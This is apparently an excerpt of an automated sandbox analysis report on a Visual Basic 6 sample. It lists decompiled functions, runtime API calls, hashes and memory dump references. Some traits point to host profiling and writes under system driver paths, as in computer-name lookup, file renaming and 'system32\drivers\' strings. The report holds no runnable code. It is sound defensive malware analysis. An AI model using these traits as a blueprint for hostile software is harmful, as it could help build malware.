                                                                                      • Part of subcall function 004156D0: __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415724
                                                                                      • Part of subcall function 004156D0: __vbaFreeStr.MSVBVM60 ref: 0041572D
                                                                                    • #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                    • #529.MSVBVM60(00004008), ref: 00415B88
                                                                                    • #609.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00415BB5
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 00415BC0
                                                                                    • __vbaVarDup.MSVBVM60 ref: 00415BDA
                                                                                    • #709.MSVBVM60(00000000,00406544,000000FF,00000000,?), ref: 00415C0F
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00415C1C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C27
                                                                                    • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 00415C3A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C45
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 00415C4C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C57
                                                                                    • #535.MSVBVM60(00000000), ref: 00415C5E
                                                                                    • __vbaStrR4.MSVBVM60 ref: 00415C68
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C73
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 00415C7A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00415C85
                                                                                    • __vbaNameFile.MSVBVM60(00000000), ref: 00415C8C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,00000000), ref: 00415CAC
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000000,004032B6), ref: 00415CBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                    • String ID: yymmdd
                                                                                    • API String ID: 2807397001-2871001947
                                                                                    • Opcode ID: 0a52f3ea78d8377f9a2e471ac3c9d7155881456b4ba9d1ca500980605009cd58
                                                                                    • Instruction ID: da5027675b2f5c6fcc5daed963e92fc9253badbc1f1ecd6ba165b842c6da7c45
                                                                                    • Opcode Fuzzy Hash: 0a52f3ea78d8377f9a2e471ac3c9d7155881456b4ba9d1ca500980605009cd58
                                                                                    • Instruction Fuzzy Hash: 48511D75900208EFDB04DF94D948BDEBBB8FF48305F108569F506BB2A0DB745A48CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00429CA0 Relevance: 27.1, APIs: 18, Instructions: 104COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaSetSystemError.MSVBVM60(00000064,004031C0,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429CF6
                                                                                    • #525.MSVBVM60(00000200,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D05
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D16
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D20
                                                                                    • SHGetPathFromIDList.SHELL32(?,00000000), ref: 00429D30
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D3A
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D43
                                                                                    • #537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D50
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5B
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5F
                                                                                    • #616.MSVBVM60(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D73
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D7E
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D86
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D91
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D9D
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DB5
                                                                                    • __vbaFreeStr.MSVBVM60(00429DEF,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DE8
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429E05
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$ErrorList$#525#537#616AnsiCopyFromOverflowPathSystemUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 3494673155-0
                                                                                    • Opcode ID: 06e0597c0c0a64de7a739e86bbd130d0eaa357415623081fa9728b986bb3ce25
                                                                                    • Instruction ID: 358cedcb50fb0de278f4ad7536de046e5609ba25d4bc9f82414949036a89438a
                                                                                    • Opcode Fuzzy Hash: 06e0597c0c0a64de7a739e86bbd130d0eaa357415623081fa9728b986bb3ce25
                                                                                    • Instruction Fuzzy Hash: 46310E71D10219AFDB04EFB5DD89DEEBBB8EF58700F10812AE506B6260DA785905CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041E880 Relevance: 25.6, APIs: 17, Instructions: 78COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,0040BC8B), ref: 0041E89E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8CE
                                                                                    • #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8E0
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E8EB
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041E8FC
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041E911
                                                                                    • GetComputerNameA.KERNEL32 ref: 0041E91D
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041E92B
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E934
                                                                                    • #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041E949
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E954
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041E95D
                                                                                    • #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041E96D
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E978
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E981
                                                                                    • __vbaFreeStr.MSVBVM60(0041E9B5,?,?,?,00000000,Function_000032B6), ref: 0041E9AE
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E9C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$Error$#525#537#616AnsiBstrChkstkComputerNameOverflowUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 3892761589-0
                                                                                    • Opcode ID: 315b392100c3462b08fcc4b1466ef19faf135d5fa9e097fc028cf97c92f61f1c
                                                                                    • Instruction ID: ddd52465c9ed4945c744d66910b811b9efcc79ef8180f597879438901a225856
                                                                                    • Opcode Fuzzy Hash: 315b392100c3462b08fcc4b1466ef19faf135d5fa9e097fc028cf97c92f61f1c
                                                                                    • Instruction Fuzzy Hash: 3531ECB5900149EFDB04EFA4DE4DBDEBBB8EB08701F108169E502B62A0DB755A44CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004156D0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041570B
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415719
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415724
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041572D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1195834276-0
                                                                                    • Opcode ID: bdf559da7314384f190e296f1ac055395a927108a04aa4df9cc8b86ae63a2552
                                                                                    • Instruction ID: 3bfd6651098160e42727f528c249f020de588879550cabcf3784d8fb116c8987
                                                                                    • Opcode Fuzzy Hash: bdf559da7314384f190e296f1ac055395a927108a04aa4df9cc8b86ae63a2552
                                                                                    • Instruction Fuzzy Hash: 1A0121B1D00605EFCB04EFB8D94AAEF7BB8EB44700F50466AF515E3290D73899468B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00415780 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157BB
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157C9
                                                                                    • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157D4
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157DD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1195834276-0
                                                                                    • Opcode ID: 83a8390b36b60fd734ea8c397f5819164e647e3c1d550d8bc1d44403629c9ffe
                                                                                    • Instruction ID: 842bb0dc7b1d712480adeb04c5aa04fa762cb34ee96fa383d986c0466198cab9
                                                                                    • Opcode Fuzzy Hash: 83a8390b36b60fd734ea8c397f5819164e647e3c1d550d8bc1d44403629c9ffe
                                                                                    • Instruction Fuzzy Hash: 580152B1C00605DFCB00EFA8C94AAAF7BB8EB44700F50422AE511E3290D73859428B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403670 Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 488 403670-403698 #100 489 403625-403628 __vbaRaiseEvent 488->489 490 40369a-4036d5 488->490 489->488 491 4036d8-403706 490->491 493 403708-403709 491->493 494 40375f 491->494 496 40370b-403739 493->496 497 40376e-40379c 493->497 496->491 500 40373b-403746 496->500 498 40380e-403827 497->498 499 40379e-4037a0 497->499 501 4037a2-403801 499->501 502 403807-403809 499->502 500->494 501->502 502->498
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: #100
                                                                                    • String ID:
                                                                                    • API String ID: 1341478452-0
                                                                                    • Opcode ID: 11ea1c51b5a51515781a12991443ec066bd5106ecc6824d3c35676c3fc523bff
                                                                                    • Instruction ID: 87d76072f60c1bc7f33af001724cdeb9567c685050ecb4be3524b273619080b8
                                                                                    • Opcode Fuzzy Hash: 11ea1c51b5a51515781a12991443ec066bd5106ecc6824d3c35676c3fc523bff
                                                                                    • Instruction Fuzzy Hash: 805185A680E7C15FC70387704D756557FB0AE23209B2E86EBC4C0DB1E3E2AD590AD766
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00416130 Relevance: 720.3, APIs: 407, Strings: 3, Instructions: 2826COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00416205
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00416230
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00416251
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00416271
                                                                                    • __vbaStrMove.MSVBVM60(0042C028), ref: 00416284
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004162D2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00416315
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00407CCC,00000000,00000001), ref: 00416350
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00416357
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0041635F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00416366
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0041636B
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00406F58,00000000,00000001), ref: 0041639A
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$Move$System$BoundsFreeGenerateUnlock
                                                                                    • String ID: d/m/yy h:m$system32\drivers\$system\
                                                                                    • API String ID: 4109330638-2282477228
                                                                                    • Opcode ID: 161571ce6ef3f7305a61f0ace64fbd078412d40ef427ac6ccd469720dc9a114e
                                                                                    • Instruction ID: d0160703c745c1a143ef53c75ac1b7ca3f1d84f450066f924383876c7bbd0f3b
                                                                                    • Opcode Fuzzy Hash: 161571ce6ef3f7305a61f0ace64fbd078412d40ef427ac6ccd469720dc9a114e
                                                                                    • Instruction Fuzzy Hash: 93336D71A00219DFCB14DFA4DD84AEEB7B9FF48300F10816AE50AE7265DB749985CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00422F50 Relevance: 684.7, APIs: 386, Strings: 4, Instructions: 2188COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 0042317F
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00423187
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 0042318B
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00406E0C,?,?,00000160,00000101,?,00000000), ref: 004231B6
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 004231C9
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 004231D5
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00406E0C,?,?,?,00000000), ref: 004231EE
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00406E0C,?,?,00000160,00000100,?,00000000), ref: 00423227
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 0042323A
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00423246
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00406E0C,?,?,?,00000000), ref: 0042325F
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00423270
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0042327C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,00000278,?,00000000), ref: 004232A2
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004232B1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,0000011C,?,00000000), ref: 004232D1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,00000084,?,00000000), ref: 0042331C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,0000008C,?,00000000), ref: 00423364
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,00000154,?,00000000), ref: 00423389
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,00000050,?,00000000), ref: 004233AD
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,000000E0,?,00000000), ref: 004233E3
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 00423409
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000264,?,00000000), ref: 0042343E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00423450
                                                                                    • __vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00423478
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042348C
                                                                                    • __vbaI2I4.MSVBVM60 ref: 004234BF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000284), ref: 0042354C
                                                                                    • __vbaI2I4.MSVBVM60(?,?), ref: 00423574
                                                                                    • __vbaI2I4.MSVBVM60(?,?), ref: 00423592
                                                                                    • __vbaI2I4.MSVBVM60(?,?), ref: 004235B0
                                                                                    • #537.MSVBVM60(00000000,?), ref: 004235F6
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423600
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 00423603
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042360D
                                                                                    • #537.MSVBVM60(00000000,00000000), ref: 00423612
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042361C
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0042361F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423629
                                                                                    • #537.MSVBVM60(00000000,00000000), ref: 0042362E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423638
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0042363B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423645
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0042366C
                                                                                    • #537.MSVBVM60(?,?), ref: 00423695
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042369F
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004236A2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236AC
                                                                                    • #537.MSVBVM60(?,00000000), ref: 004236B7
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236C1
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004236C4
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236CE
                                                                                    • #537.MSVBVM60(?,00000000), ref: 004236D9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236E3
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004236E6
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236F0
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00423717
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00423774
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004237C7
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004237DF
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004237FF
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00423812
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00423856
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00423888
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000284), ref: 0042390C
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423950
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423985
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423994
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004239A7
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004239CD
                                                                                    • __vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 004239DE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423A15
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423A46
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423A55
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423A68
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423A88
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00423A97
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423AC6
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423AF7
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423B06
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423B19
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423B39
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423B6A
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423B9F
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423BAE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423BC5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423BF8
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423C40
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423C75
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423C84
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423C97
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423CBD
                                                                                    • __vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 00423CCE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423D05
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423D36
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423D45
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423D58
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423D78
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00423D87
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423DB6
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423DE7
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423DF6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423E09
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423E29
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423E5A
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423E8F
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423E9E
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423EB5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423ED3
                                                                                    • __vbaStrCat.MSVBVM60(0040886C,00000000), ref: 00423EF0
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423EFA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00423F06
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00423F12
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00423F6A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423FB9
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423FD1
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423FED
                                                                                    • __vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 00424002
